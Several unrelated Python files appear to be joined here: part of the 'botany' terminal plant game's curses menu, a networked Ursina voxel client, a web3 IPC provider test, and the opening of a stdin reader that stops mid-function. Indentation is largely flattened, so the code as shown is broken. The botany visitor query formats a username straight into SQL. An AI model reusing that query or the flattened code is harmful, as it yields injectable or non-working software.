            # So, to keep botany as accessible as possible to everyone, it is safe to ignore the error.
pass
self.screen.keypad(1)
self.plant = this_plant
self.visited_plant = None
self.user_data = this_data
self.plant_string = self.plant.parse_plant()
self.plant_ticks = str(int(self.plant.ticks))
self.exit = False
self.infotoggle = 0
self.maxy, self.maxx = self.screen.getmaxyx()
# Highlighted and Normal line definitions
if curses.has_colors():
self.define_colors()
self.highlighted = curses.color_pair(1)
else:
self.highlighted = curses.A_REVERSE
self.normal = curses.A_NORMAL
# Threaded screen update for live changes
screen_thread = threading.Thread(target=self.update_plant_live, args=())
screen_thread.daemon = True
screen_thread.start()
        # Recursive lock to prevent both threads from drawing at the same time
self.screen_lock = threading.RLock()
self.screen.clear()
self.show(["water","look","garden","visit", "instructions"], title=' botany ', subtitle='options')
def define_colors(self):
# set curses color pairs manually
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(7, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(8, curses.COLOR_CYAN, curses.COLOR_BLACK)
ESC_CODE_TO_PAIR = {
'' : 0, # normal
'0' : 0, # normal
'30' : 1, # black
'31' : 7, # red
'32' : 3, # green
'33' : 6, # yellow
'34' : 4, # blue
'35' : 5, # magenta
'36' : 8, # cyan
'37' : 2 # white
}
def esc_code_to_color(self, esc_code):
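        # Maps an ANSI SGR code (the digits between '\x1b[' and 'm') to a
        # curses color pair, e.g. '32' (green) -> color pair 3; unknown codes
        # fall back to pair 0 (normal).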
return curses.color_pair(self.ESC_CODE_TO_PAIR.get(esc_code, 0))
def show(self, options, title, subtitle):
# Draws a menu with parameters
self.set_options(options)
self.update_options()
self.title = title
self.subtitle = subtitle
self.selected = 0
self.initialized = True
self.draw_menu()
def update_options(self):
# Makes sure you can get a new plant if it dies
if self.plant.dead or self.plant.stage == 5:
if "harvest" not in self.options:
self.options.insert(-1,"harvest")
else:
if "harvest" in self.options:
self.options.remove("harvest")
def set_options(self, options):
# Validates that the last option is "exit"
if options[-1] != 'exit':
options.append('exit')
self.options = options
def draw(self):
# Draw the menu and lines
self.maxy, self.maxx = self.screen.getmaxyx()
self.screen_lock.acquire()
self.screen.refresh()
try:
self.draw_default()
self.screen.refresh()
except Exception as exception:
# Makes sure data is saved in event of a crash due to window resizing
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
traceback.print_exc()
self.screen_lock.release()
def draw_menu(self):
# Actually draws the menu and handles branching
request = ""
try:
while request != "exit":
self.draw()
request = self.get_user_input()
self.handle_request(request)
self.__exit__()
# Also calls __exit__, but adds traceback after
except Exception as exception:
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
#traceback.print_exc()
except IOError as exception:
self.screen.clear()
self.screen.refresh()
self.__exit__()
def ascii_render(self, filename, ypos, xpos):
# Prints ASCII art from file at given coordinates
this_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),"art")
this_filename = os.path.join(this_dir,filename + '.txt')
this_file = open(this_filename,"r")
this_string = this_file.readlines()
this_file.close()
self.screen_lock.acquire()
for y, line in enumerate(this_string, 2):
self.screen.addstr(ypos+y, xpos, line, curses.A_NORMAL)
# self.screen.refresh()
self.screen_lock.release()
def ansi_render(self, filename, ypos, xpos):
# Prints ANSI art from file at given coordinates
# Falls back on ASCII if no ANSI version exists
# Assumes curses.has_colors()
this_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),"art")
this_filename = os.path.join(this_dir,filename + '.ansi')
if not os.path.exists(this_filename):
self.ascii_render(filename, ypos, xpos)
return
this_file = open(this_filename,"r")
this_string = this_file.readlines()
this_file.close()
self.screen_lock.acquire()
color = curses.A_NORMAL
for y, line in enumerate(this_string, 2):
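            # Split the line on the ANSI escape introducer '\x1b[' so each
            # token looks like '<code>m<text>'; tokens without 'm' carry no
            # color code and keep the color currently in effect.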
code_text_pairs = [tuple(token.split('m', 1)) if 'm' in token else (None, token)
for token in line.rstrip('\r\n').split('\x1b[') ]
color_text_pairs = [(color, text) if code == None else (self.esc_code_to_color(code), text)
for (code, text) in code_text_pairs]
x = 0
for (color, text) in color_text_pairs:
# Handle overflowing art gracefully
text = text[:max(0, self.maxx-(xpos+x))]
if not text:
continue
self.screen.addstr(ypos+y, xpos+x, text, color)
x += len(text)
self.screen_lock.release()
def art_render(self, filename, ypos, xpos):
if curses.has_colors():
self.ansi_render(filename, ypos, xpos)
else:
self.ascii_render(filename, ypos, xpos)
def draw_plant_ascii(self, this_plant):
ypos = 0
xpos = int((self.maxx-37)/2 + 25)
plant_art_list = [
'poppy',
'cactus',
'aloe',
'flytrap',
'jadeplant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
        if this_plant.dead:
self.art_render('rip', ypos, xpos)
elif datetime.date.today().month == 10 and datetime.date.today().day == 31:
self.art_render('jackolantern', ypos, xpos)
elif this_plant.stage == 0:
self.art_render('seed', ypos, xpos)
elif this_plant.stage == 1:
self.art_render('seedling', ypos, xpos)
elif this_plant.stage == 2:
this_filename = plant_art_list[this_plant.species]+'1'
self.art_render(this_filename, ypos, xpos)
elif this_plant.stage == 3 or this_plant.stage == 5:
this_filename = plant_art_list[this_plant.species]+'2'
self.art_render(this_filename, ypos, xpos)
elif this_plant.stage == 4:
this_filename = plant_art_list[this_plant.species]+'3'
self.art_render(this_filename, ypos, xpos)
def draw_default(self):
# draws default menu
clear_bar = " " * (int(self.maxx*2/3))
self.screen_lock.acquire()
self.screen.addstr(1, 2, self.title, curses.A_STANDOUT) # Title for this menu
self.screen.addstr(3, 2, self.subtitle, curses.A_BOLD) #Subtitle for this menu
# clear menu on screen
for index in range(len(self.options)+1):
self.screen.addstr(4+index, 4, clear_bar, curses.A_NORMAL)
# display all the menu items, showing the 'pos' item highlighted
for index in range(len(self.options)):
textstyle = self.normal
if index == self.selected:
textstyle = self.highlighted
self.screen.addstr(4+index ,4, clear_bar, curses.A_NORMAL)
self.screen.addstr(4+index ,4, "%d - %s" % (index+1, self.options[index]), textstyle)
self.screen.addstr(12, 2, clear_bar, curses.A_NORMAL)
self.screen.addstr(13, 2, clear_bar, curses.A_NORMAL)
self.screen.addstr(12, 2, "plant: ", curses.A_DIM)
self.screen.addstr(12, 9, self.plant_string, curses.A_NORMAL)
self.screen.addstr(13, 2, "score: ", curses.A_DIM)
self.screen.addstr(13, 9, self.plant_ticks, curses.A_NORMAL)
# display fancy water gauge
if not self.plant.dead:
water_gauge_str = self.water_gauge()
self.screen.addstr(4,14, water_gauge_str, curses.A_NORMAL)
else:
self.screen.addstr(4,13, clear_bar, curses.A_NORMAL)
self.screen.addstr(4,14, "( RIP )", curses.A_NORMAL)
# draw cute ascii from files
if self.visited_plant:
# Needed to prevent drawing over a visited plant
self.draw_plant_ascii(self.visited_plant)
else:
self.draw_plant_ascii(self.plant)
self.screen_lock.release()
def water_gauge(self):
# build nice looking water gauge
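        # Illustrative example: ~12 hours after watering, water_left_pct is
        # about 0.5, so the gauge shows 5 of 10 filled segments and "50%".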
water_left_pct = 1 - ((time.time() - self.plant.watered_timestamp)/86400)
# don't allow negative value
water_left_pct = max(0, water_left_pct)
water_left = int(math.ceil(water_left_pct * 10))
water_string = "(" + (")" * water_left) + ("." * (10 - water_left)) + ") " + str(int(water_left_pct * 100)) + "% "
return water_string
def update_plant_live(self):
# updates plant data on menu screen, live!
while not self.exit:
self.plant_string = self.plant.parse_plant()
self.plant_ticks = str(int(self.plant.ticks))
if self.initialized:
self.update_options()
self.draw()
time.sleep(1)
def get_user_input(self):
# gets the user's input
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
if user_in == -1: # Input comes from pipe/file and is closed
raise IOError
## DEBUG KEYS - enable these lines to see curses key codes
# self.screen.addstr(2, 2, str(user_in), curses.A_NORMAL)
# self.screen.refresh()
# Resize sends curses.KEY_RESIZE, update display
if user_in == curses.KEY_RESIZE:
self.maxy,self.maxx = self.screen.getmaxyx()
self.screen.clear()
self.screen.refresh()
# enter, exit, and Q Keys are special cases
if user_in == 10:
return self.options[self.selected]
if user_in == 27:
return self.options[-1]
if user_in == 113:
self.selected = len(self.options) - 1
return
# this is a number; check to see if we can set it
if user_in >= ord('1') and user_in <= ord(str(min(7,len(self.options)))):
self.selected = user_in - ord('0') - 1 # convert keypress back to a number, then subtract 1 to get index
return
# increment or Decrement
down_keys = [curses.KEY_DOWN, 14, ord('j')]
up_keys = [curses.KEY_UP, 16, ord('k')]
if user_in in down_keys: # down arrow
self.selected += 1
if user_in in up_keys: # up arrow
self.selected -=1
# modulo to wrap menu cursor
self.selected = self.selected % len(self.options)
return
def format_garden_data(self,this_garden):
# Returns list of lists (pages) of garden entries
plant_table = []
for plant_id in this_garden:
if this_garden[plant_id]:
if not this_garden[plant_id]["dead"]:
this_plant = this_garden[plant_id]
plant_table.append((this_plant["owner"],
this_plant["age"],
int(this_plant["score"]),
this_plant["description"]))
return plant_table
def format_garden_entry(self, entry):
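        # entry is (owner, age, score, description); columns are the owner
        # (truncated to 14 chars), age right-aligned to 16, score right-aligned
        # to 8 with a 'p' suffix, then the description.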
return "{:14.14} - {:>16} - {:>8}p - {}".format(*entry)
def sort_garden_table(self, table, column, ascending):
""" Sort table in place by a specified column """
def key(entry):
entry = entry[column]
            # When sorting ages, convert the formatted age string to seconds
if column == 1:
coeffs = [24*60*60, 60*60, 60, 1]
nums = [int(n[:-1]) for n in entry.split(":")]
if len(nums) == len(coeffs):
entry = sum(nums[i] * coeffs[i] for i in range(len(nums)))
return entry
return table.sort(key=key, reverse=not ascending)
def filter_garden_table(self, table, pattern):
""" Filter table using a pattern, and return the new table """
def filterfunc(entry):
if len(pattern) == 0:
return True
entry_txt = self.format_garden_entry(entry)
try:
result = bool(re.search(pattern, entry_txt))
except Exception as e:
# In case of invalid regex, don't match anything
result = False
return result
return list(filter(filterfunc, table))
def draw_garden(self):
# draws community garden
# load data from sqlite db
this_garden = self.user_data.retrieve_garden_from_db()
# format data
self.clear_info_pane()
if self.infotoggle == 2:
# the screen IS currently showing the garden (1 page), make the
# text a bunch of blanks to clear it out
self.infotoggle = 0
return
# if infotoggle isn't 2, the screen currently displays other stuff
plant_table_orig = self.format_garden_data(this_garden)
self.infotoggle = 2
# print garden information OR clear it
index = 0
sort_column, sort_ascending = 0, True
sort_keys = ["n", "a", "s", "d"] # Name, Age, Score, Description
plant_table = plant_table_orig
self.sort_garden_table(plant_table, sort_column, sort_ascending)
while True:
entries_per_page = self.maxy - 16
index_max = min(len(plant_table), index + entries_per_page)
plants = plant_table[index:index_max]
page = [self.format_garden_entry(entry) for entry in plants]
self.screen_lock.acquire()
self.draw_info_text(page)
# Multiple pages, paginate and require keypress
page_text = "(%d-%d/%d) | sp/next | bksp/prev | s <col #>/sort | f/filter | q/quit" % (index, index_max, len(plant_table))
self.screen.addstr(self.maxy-2, 2, page_text)
self.screen.refresh()
self.screen_lock.release()
c = self.screen.getch()
if c == -1: # Input comes from pipe/file and is closed
raise IOError
self.infotoggle = 0
# Quit
if c == ord("q") or c == ord("x") or c == 27:
break
# Next page
elif c in [curses.KEY_ENTER, curses.KEY_NPAGE, ord(" "), ord("\n")]:
index += entries_per_page
if index >= len(plant_table):
break
# Previous page
elif c == curses.KEY_BACKSPACE or c == curses.KEY_PPAGE:
index = max(index - entries_per_page, 0)
# Next line
elif c == ord("j") or c == curses.KEY_DOWN:
index = max(min(index + 1, len(plant_table) - 1), 0)
# Previous line
elif c == ord("k") or c == curses.KEY_UP:
index = max(index - 1, 0)
# Sort entries
elif c == ord("s"):
c = self.screen.getch()
if c == -1: # Input comes from pipe/file and is closed
raise IOError
column = -1
if c < 255 and chr(c) in sort_keys:
column = sort_keys.index(chr(c))
elif ord("1") <= c <= ord("4"):
column = c - ord("1")
if column != -1:
if sort_column == column:
sort_ascending = not sort_ascending
else:
sort_column = column
sort_ascending = True
self.sort_garden_table(plant_table, sort_column, sort_ascending)
# Filter entries
elif c == ord("/") or c == ord("f"):
self.screen.addstr(self.maxy-2, 2, "Filter: " + " " * (len(page_text)-8))
pattern = self.get_user_string(10, self.maxy-2, lambda x: x in string.printable)
plant_table = self.filter_garden_table(plant_table_orig, pattern)
self.sort_garden_table(plant_table, sort_column, sort_ascending)
index = 0
# Clear page before drawing next
self.clear_info_pane()
self.clear_info_pane()
def get_plant_description(self, this_plant):
output_text = ""
this_species = this_plant.species_list[this_plant.species]
this_color = this_plant.color_list[this_plant.color]
this_stage = this_plant.stage
stage_descriptions = {
0:[
"You're excited about your new seed.",
"You wonder what kind of plant your seed will grow into.",
"You're ready for a new start with this plant.",
"You're tired of waiting for your seed to grow.",
"You wish your seed could tell you what it needs.",
"You can feel the spirit inside your seed.",
"These pretzels are making you thirsty.",
"Way to plant, Ann!",
"'To see things in the seed, that is genius' - Lao Tzu",
],
1:[
"The seedling fills you with hope.",
"The seedling shakes in the wind.",
"You can make out a tiny leaf - or is that a thorn?",
"You can feel the seedling looking back at you.",
"You blow a kiss to your seedling.",
"You think about all the seedlings who came before it.",
"You and your seedling make a great team.",
"Your seedling grows slowly and quietly.",
"You meditate on the paths your plant's life could take.",
],
2:[
"The " + this_species + " makes you feel relaxed.",
"You sing a song to your " + this_species + ".",
"You quietly sit with your " + this_species + " for a few minutes.",
"Your " + this_species + " looks pretty good.",
"You play loud techno to your " + this_species + ".",
"You play piano to your " + this_species + ".",
"You play rap music to your " + this_species + ".",
"You whistle a tune to your " + this_species + ".",
"You read a poem to your " + this_species + ".",
"You tell a secret to your " + this_species + ".",
"You play your favorite record for your " + this_species + ".",
],
3:[
"Your " + this_species + " is growing nicely!",
"You're proud of the dedication it took to grow your " + this_species + ".",
"You take a deep breath with your " + this_species + ".",
"You think of all the words that rhyme with " + this_species + ".",
"The " + this_species + " looks full of life.",
"The " + this_species + " inspires you.",
"Your " + this_species + " makes you forget about your problems.",
"Your " + this_species + " gives you a reason to keep going.",
"Looking at your " + this_species + " helps you focus on what matters.",
"You think about how nice this " + this_species + " looks here.",
"The buds of your " + this_species + " might bloom soon.",
],
4:[
"The " + this_color + " flowers look nice on your " + this_species +"!",
"The " + this_color + " flowers have bloomed and fill you with positivity.",
"The " + this_color + " flowers remind you of your childhood.",
"The " + this_color + " flowers remind you of spring mornings.",
"The " + this_color + " flowers remind you of a forgotten memory.",
"The " + this_color + " flowers remind you of your happy place.",
"The aroma of the " + this_color + " flowers energize you.",
"The " + this_species + " has grown beautiful " + this_color + " flowers.",
"The " + this_color + " petals remind you of that favorite shirt you lost.",
"The " + this_color + " flowers remind you of your crush.",
"You smell the " + this_color + " flowers and are filled with peace.",
],
5:[
"You fondly remember the time you spent caring for your " + this_species + ".",
"Seed pods have grown on your " + this_species + ".",
"You feel like your " + this_species + " appreciates your care.",
"The " + this_species + " fills you with love.",
"You're ready for whatever comes after your " + this_species + ".",
"You're excited to start growing your next plant.",
"You reflect on when your " + this_species + " was just a seedling.",
"You grow nostalgic about the early days with your " + this_species + ".",
],
99:[
"You wish you had taken better care of your plant.",
"If only you had watered your plant more often..",
"Your plant is dead, there's always next time.",
"You cry over the withered leaves of your plant.",
"Your plant died. Maybe you need a fresh start.",
],
}
        # self.life_stages is a tuple containing the length of each stage
# (seed, seedling, young, mature, flowering)
if this_plant.dead:
this_stage = 99
this_stage_descriptions = stage_descriptions[this_stage]
description_num = random.randint(0,len(this_stage_descriptions) - 1)
# If not fully grown
if this_stage <= 4:
# Growth hint
if this_stage >= 1:
last_growth_at = this_plant.life_stages[this_stage - 1]
else:
last_growth_at = 0
ticks_since_last = this_plant.ticks - last_growth_at
ticks_between_stage = this_plant.life_stages[this_stage] - last_growth_at
if ticks_since_last >= ticks_between_stage * 0.8:
output_text += "You notice your plant looks different.\n"
output_text += this_stage_descriptions[description_num] + "\n"
# if seedling
if this_stage == 1:
species_options = [this_plant.species_list[this_plant.species],
this_plant.species_list[(this_plant.species+3) % len(this_plant.species_list)],
this_plant.species_list[(this_plant.species-3) % len(this_plant.species_list)]]
random.shuffle(species_options)
plant_hint = "It could be a(n) " + species_options[0] + ", " + species_options[1] + ", or " + species_options[2]
output_text += plant_hint + ".\n"
# if young plant
if this_stage == 2:
if this_plant.rarity >= 2:
rarity_hint = "You feel like your plant is special."
output_text += rarity_hint + ".\n"
# if mature plant
if this_stage == 3:
color_options = [this_plant.color_list[this_plant.color],
this_plant.color_list[(this_plant.color+3) % len(this_plant.color_list)],
this_plant.color_list[(this_plant.color-3) % len(this_plant.color_list)]]
random.shuffle(color_options)
plant_hint = "You can see the first hints of " + color_options[0] + ", " + color_options[1] + ", or " + color_options[2]
output_text += plant_hint + ".\n"
return output_text
def draw_plant_description(self, this_plant):
# If menu is currently showing something other than the description
self.clear_info_pane()
if self.infotoggle != 1:
# get plant description before printing
output_string = self.get_plant_description(this_plant)
growth_multiplier = 1 + (0.2 * (this_plant.generation-1))
output_string += "Generation: {}\nGrowth rate: {}x".format(self.plant.generation, growth_multiplier)
self.draw_info_text(output_string)
self.infotoggle = 1
else:
# otherwise just set toggle
self.infotoggle = 0
def draw_instructions(self):
# Draw instructions on screen
self.clear_info_pane()
if self.infotoggle != 4:
instructions_txt = ("welcome to botany. you've been given a seed\n"
"that will grow into a beautiful plant. check\n"
"in and water your plant every 24h to keep it\n"
"growing. 5 days without water = death. your\n"
"plant depends on you & your friends to live!\n"
"more info is available in the readme :)\n"
"https://github.com/jifunks/botany/blob/master/README.md\n"
" cheers,\n"
" curio\n"
)
self.draw_info_text(instructions_txt)
self.infotoggle = 4
else:
self.infotoggle = 0
def clear_info_pane(self):
# Clears bottom part of screen
self.screen_lock.acquire()
clear_bar = " " * (self.maxx - 3)
this_y = 14
while this_y < self.maxy:
self.screen.addstr(this_y, 2, clear_bar, curses.A_NORMAL)
this_y += 1
self.screen.refresh()
self.screen_lock.release()
def draw_info_text(self, info_text, y_offset = 0):
# print lines of text to info pane at bottom of screen
self.screen_lock.acquire()
if type(info_text) is str:
info_text = info_text.splitlines()
for y, line in enumerate(info_text, 2):
this_y = y+12 + y_offset
if len(line) > self.maxx - 3:
line = line[:self.maxx-3]
if this_y < self.maxy:
self.screen.addstr(this_y, 2, line, curses.A_NORMAL)
self.screen.refresh()
self.screen_lock.release()
def harvest_confirmation(self):
self.clear_info_pane()
# get plant description before printing
max_stage = len(self.plant.stage_list) - 1
harvest_text = ""
if not self.plant.dead:
if self.plant.stage == max_stage:
harvest_text += "Congratulations! You raised your plant to its final stage of growth.\n"
harvest_text += "Your next plant will grow at a speed of: {}x\n".format(1 + (0.2 * self.plant.generation))
harvest_text += "If you harvest your plant you'll start over from a seed.\nContinue? (Y/n)"
self.draw_info_text(harvest_text)
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
if user_in == -1: # Input comes from pipe/file and is closed
raise IOError
if user_in in [ord('Y'), ord('y')]:
self.plant.start_over()
else:
pass
self.clear_info_pane()
def build_weekly_visitor_output(self, visitors):
visitor_block = ""
visitor_line = ""
for visitor in visitors:
this_visitor_string = str(visitor) + "({}) ".format(visitors[str(visitor)])
if len(visitor_line + this_visitor_string) > self.maxx-3:
visitor_block += '\n'
visitor_line = ""
visitor_block += this_visitor_string
visitor_line += this_visitor_string
return visitor_block
def build_latest_visitor_output(self, visitors):
visitor_line = ""
for visitor in visitors:
if len(visitor_line + visitor) > self.maxx-10:
visitor_line += "and more"
break
visitor_line += visitor + ' '
return [visitor_line]
def get_weekly_visitors(self):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' ORDER BY weekly_visits".format(self.plant.owner))
visitor_data = c.fetchall()
conn.close()
visitor_block = ""
visitor_line = ""
if visitor_data:
for visitor in visitor_data:
visitor_name = visitor[2]
weekly_visits = visitor[3]
this_visitor_string = "{}({}) ".format(visitor_name, weekly_visits)
if len(visitor_line + this_visitor_string) > self.maxx-3:
visitor_block += '\n'
visitor_line = ""
visitor_block += this_visitor_string
visitor_line += this_visitor_string
else:
visitor_block = 'nobody :('
return visitor_block
def get_user_string(self, xpos=3, ypos=15, filterfunc=str.isalnum, completer=None):
# filter allowed characters using filterfunc, alphanumeric by default
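        # Enter (keycode 10) submits; backspace codes 127/263 cover macOS and other
        # terminals; Tab / Shift-Tab cycle completions when a completer is provided.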
user_string = ""
user_input = 0
if completer:
completer = completer(self)
while user_input != 10:
user_input = self.screen.getch()
if user_input == -1: # Input comes from pipe/file and is closed
raise IOError
self.screen_lock.acquire()
# osx and unix backspace chars...
if user_input == 127 or user_input == 263:
if len(user_string) > 0:
user_string = user_string[:-1]
if completer:
completer.update_input(user_string)
self.screen.addstr(ypos, xpos, " " * (self.maxx-xpos-1))
elif user_input in [ord('\t'), curses.KEY_BTAB] and completer:
direction = 1 if user_input == ord('\t') else -1
user_string = completer.complete(direction)
self.screen.addstr(ypos, xpos, " " * (self.maxx-xpos-1))
elif user_input < 256 and user_input != 10:
if filterfunc(chr(user_input)) or chr(user_input) == '_':
user_string += chr(user_input)
if completer:
completer.update_input(user_string)
self.screen.addstr(ypos, xpos, str(user_string))
self.screen.refresh()
self.screen_lock.release()
return user_string
def visit_handler(self):
self.clear_info_pane()
self.draw_info_text("whose plant would you like to visit?")
self.screen.addstr(15, 2, '~')
if self.plant.visitors:
latest_visitor_string = self.build_latest_visitor_output(self.plant.visitors)
self.draw_info_text("since last time, you were visited by: ", 3)
self.draw_info_text(latest_visitor_string, 4)
self.plant.visitors = []
weekly_visitor_text = self.get_weekly_visitors()
self.draw_info_text("this week you've been visited by: ", 6)
self.draw_info_text(weekly_visitor_text, 7)
guest_garden = self.get_user_string(completer = completer.LoginCompleter)
if not guest_garden:
self.clear_info_pane()
return None
if guest_garden.lower() == getpass.getuser().lower():
self.screen.addstr(16, 2, "you're already here!")
self.screen.getch()
self.clear_info_pane()
return None
home_folder = os.path.dirname(os.path.expanduser("~"))
guest_json = home_folder + "/{}/.botany/{}_plant_data.json".format(guest_garden, guest_garden)
guest_plant_description = ""
if os.path.isfile(guest_json):
with open(guest_json) as f:
visitor_data = json.load(f)
guest_plant_description = visitor_data['description']
self.visited_plant = self.get_visited_plant(visitor_data)
        guest_visitor_file = home_folder + "/{}/.botany/visitors.json".format(guest_garden)
if os.path.isfile(guest_visitor_file):
water_success = self.water_on_visit(guest_visitor_file)
if water_success:
self.screen.addstr(16, 2, "...you watered ~{}'s {}...".format(str(guest_garden), guest_plant_description))
if self.visited_plant:
self.draw_plant_ascii(self.visited_plant)
else:
self.screen.addstr(16, 2, "{}'s garden is locked, but you can see in...".format(guest_garden))
else:
self.screen.addstr(16, 2, "i can't seem to find directions to {}...".format(guest_garden))
try:
self.screen.getch()
self.clear_info_pane()
self.draw_plant_ascii(self.plant)
finally:
self.visited_plant = None
def water_on_visit(self, guest_visitor_file):
visitor_data = {}
# using -1 here so that old running instances can be watered
guest_data = {'user': getpass.getuser(), 'timestamp': int(time.time()) - 1}
if os.path.isfile(guest_visitor_file):
if not os.access(guest_visitor_file, os.W_OK):
return False
with open(guest_visitor_file) as f:
visitor_data = json.load(f)
visitor_data.append(guest_data)
with open(guest_visitor_file, mode='w') as f:
f.write(json.dumps(visitor_data, indent=2))
return True
def get_visited_plant(self, visitor_data):
""" Returns a drawable pseudo plant object from json data """
class VisitedPlant: pass
plant = VisitedPlant()
plant.stage = 0
plant.species = 0
if "is_dead" not in visitor_data:
return None
plant.dead = visitor_data["is_dead"]
if plant.dead:
return plant
if "stage" in visitor_data:
stage = visitor_data["stage"]
if stage in self.plant.stage_list:
plant.stage = self.plant.stage_list.index(stage)
if "species" in visitor_data:
species = visitor_data["species"]
if species in self.plant.species_list:
plant.species = self.plant.species_list.index(species)
else:
return None
elif plant.stage > 1:
return None
return plant
def handle_request(self, request):
# Menu options call functions here
        if request is None: return
if request == "harvest":
self.harvest_confirmation()
if request == "water":
self.plant.water()
if request == "look":
try:
self.draw_plant_description(self.plant)
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "instructions":
try:
self.draw_instructions()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "visit":
try:
self.visit_handler()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "garden":
try:
self.draw_garden()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
def __exit__(self):
self.exit = True
cleanup()
def cleanup():
try:
curses.curs_set(2)
except curses.error:
# cursor not supported; just ignore
pass
curses.endwin()
os.system('clear')
|
core.py
|
from ursina import *
from ursina.prefabs.first_person_controller import FirstPersonController
import threading, random
import esp, client as clientlib
# Connection settings
IP = "192.168.100.245"
RECV_HEADER = 1024
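# Wire format (as used below): plain UTF-8 strings; block placements are sent and
# received as "CREATE-BLOCK <x> <y> <z> ".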
# Recv thread controls
recv_thread_status = True
latest_recv_message = ""
client = clientlib.app(IP, 80, "|")
client.connect()
app = Ursina()
class Voxel(Button):
def __init__(self, position=(0, 0, 0)):
super().__init__(
parent=scene,
position=position,
model="cube",
origin_y=0.5,
texture="white_cube",
color=color.rgb(0, random.randrange(200, 240), 8),
highlight_color=color.lime,
)
def input(self, key):
if self.hovered:
if key == "left mouse down":
new_block_pos = self.position + mouse.normal
client.send(
f"CREATE-BLOCK {str(int(new_block_pos.x))} {str(int(new_block_pos.y))} {str(int(new_block_pos.z))} "
)
# voxel = Voxel(position=new_block_pos)
if key == "right mouse down":
destroy(self)
def constant_recv():
    # Background receiver: mirror block placements broadcast by the server.
    global latest_recv_message
    while recv_thread_status:
        latest_recv_message = str(client.recv(RECV_HEADER).decode("utf-8"))
        print(latest_recv_message)
if latest_recv_message.startswith("CREATE-BLOCK "):
print(latest_recv_message[len("CREATE-BLOCK ") :])
new_voxel_pos = latest_recv_message[len("CREATE-BLOCK ") :].split(" ")
print(new_voxel_pos)
print(new_voxel_pos[0], new_voxel_pos[1], new_voxel_pos[2])
new_voxel = Voxel(
position=(
int(new_voxel_pos[0]),
int(new_voxel_pos[1]),
int(new_voxel_pos[2]),
)
)
print(
f"[RECV-FROM-SERVER]: added new block at {latest_recv_message[len('CREATE-BLOCK '):]}"
)
constant_recv_thread = threading.Thread(target=constant_recv)
constant_recv_thread.start()
def input(key):
    global recv_thread_status
    if key == "q":
        # Stop the receive thread, close the socket, and quit via Ursina's application module
        recv_thread_status = False
        client.close()
        application.quit()
for z in range(8):
for x in range(8):
voxel = Voxel(position=(x, 0, z))
player = FirstPersonController()
app.run()
|
test_ipc_provider.py
|
import os
import pathlib
import pytest
import socket
import tempfile
from threading import (
Thread,
)
import time
import uuid
from web3.auto.gethdev import (
w3,
)
from web3.middleware import (
construct_fixture_middleware,
)
from web3.providers.ipc import (
IPCProvider,
)
@pytest.fixture
def jsonrpc_ipc_pipe_path():
with tempfile.TemporaryDirectory() as temp_dir:
ipc_path = os.path.join(temp_dir, f'{uuid.uuid4()}.ipc')
try:
yield ipc_path
finally:
if os.path.exists(ipc_path):
os.remove(ipc_path)
def test_ipc_no_path():
"""
IPCProvider.isConnected() returns False when no path is supplied
"""
ipc = IPCProvider(None)
assert ipc.isConnected() is False
def test_ipc_tilda_in_path():
expectedPath = str(pathlib.Path.home()) + '/foo'
assert IPCProvider('~/foo').ipc_path == expectedPath
assert IPCProvider(pathlib.Path('~/foo')).ipc_path == expectedPath
@pytest.fixture
def simple_ipc_server(jsonrpc_ipc_pipe_path):
serv = socket.socket(socket.AF_UNIX)
serv.bind(jsonrpc_ipc_pipe_path)
serv.listen(1)
try:
yield serv
finally:
serv.close()
@pytest.fixture
def serve_empty_result(simple_ipc_server):
def reply():
connection, client_address = simple_ipc_server.accept()
try:
connection.recv(1024)
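            # Send the JSON-RPC response in two chunks with a pause in between so the
            # provider must keep reading until the JSON object is complete.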
connection.sendall(b'{"id":1, "result": {}')
time.sleep(0.1)
connection.sendall(b'}')
finally:
# Clean up the connection
connection.close()
simple_ipc_server.close()
thd = Thread(target=reply, daemon=True)
thd.start()
try:
yield
finally:
thd.join()
def test_sync_waits_for_full_result(jsonrpc_ipc_pipe_path, serve_empty_result):
provider = IPCProvider(pathlib.Path(jsonrpc_ipc_pipe_path), timeout=3)
result = provider.make_request("method", [])
assert result == {'id': 1, 'result': {}}
provider._socket.sock.close()
def test_web3_auto_gethdev():
assert isinstance(w3.provider, IPCProvider)
return_block_with_long_extra_data = construct_fixture_middleware({
'eth_getBlockByNumber': {'extraData': '0x' + 'ff' * 33},
})
w3.middleware_onion.inject(return_block_with_long_extra_data, layer=0)
block = w3.eth.get_block('latest')
assert 'extraData' not in block
assert block.proofOfAuthorityData == b'\xff' * 33
|
main.py
|
import sys
import queue
import threading
import json
import collections
import time
import logging
logging.basicConfig(level=logging.DEBUG, filename='/Users/tmssmith/StS_AI/AI_test/log.log')
def read_stdin(input_queue):
"""Read lines from stdin and write them to a queue
:param input_queue: A queue, to which lines from stdin will be written
:type input_queue: queue.Queue
:return: None
"""
    while True:
        stdin_input = ""
        while True:
            input_char = sys.stdin.read(1)
            if input_char == '':
                # stdin closed (EOF); stop the reader thread
                return
            if input_char == '\n':
                break
            else:
